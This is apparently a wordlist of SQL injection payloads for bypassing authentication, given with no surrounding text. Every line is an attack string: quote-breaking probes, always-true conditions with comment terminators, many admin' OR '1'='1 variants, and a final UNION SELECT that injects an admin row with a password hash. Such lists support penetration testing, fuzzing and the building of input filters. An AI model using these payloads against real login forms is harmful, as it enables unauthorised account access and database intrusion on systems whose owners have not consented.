'
``
''
"
''
;
' OR "
-- OR #
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
'='
'LIKE'
'=0--+
OR 1=1
' OR 'x'='x
' AND id IS NULL; --
'-'
' '
'&'
'^'
'*'
' OR ''-'
' OR '' '
' OR ''&'
' OR ''^'
' OR ''*'
"-"
" "
"&"
"^"
"*"
" OR ""-"
" OR "" "
" OR ""&"
" OR ""^"
" OR ""*"
OR true--
" OR true--
' OR true--
") OR true--
') OR true--
' OR 'x'='x
') OR ('x')=('x
')) OR (('x'))=(('x
" OR "x"="x
") OR ("x")=("x
")) OR (("x"))=(("x
OR 1=1
OR 1=1--
OR 1=1#
OR 1=1/*
admin' --
admin' #
admin'/*
admin' OR '1'='1
admin' OR '1'='1'--
admin' OR '1'='1'#
admin' OR '1'='1'/*
admin' OR 1=1 OR ''=''
admin' OR 1=1
admin' OR 1=1--
admin' OR 1=1#
admin' OR 1=1/*
admin') OR ('1'='1
admin') OR ('1'='1'--
admin') OR ('1'='1'#
admin') OR ('1'='1'/*
admin") OR ("1"="1
admin") OR ("1"="1'--
admin") OR ("1"="1'#
admin") OR ("1"="1'/*
admin") OR "1"="1
admin") OR "1"="1'--
admin") OR "1"="1'#
admin") OR "1"="1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055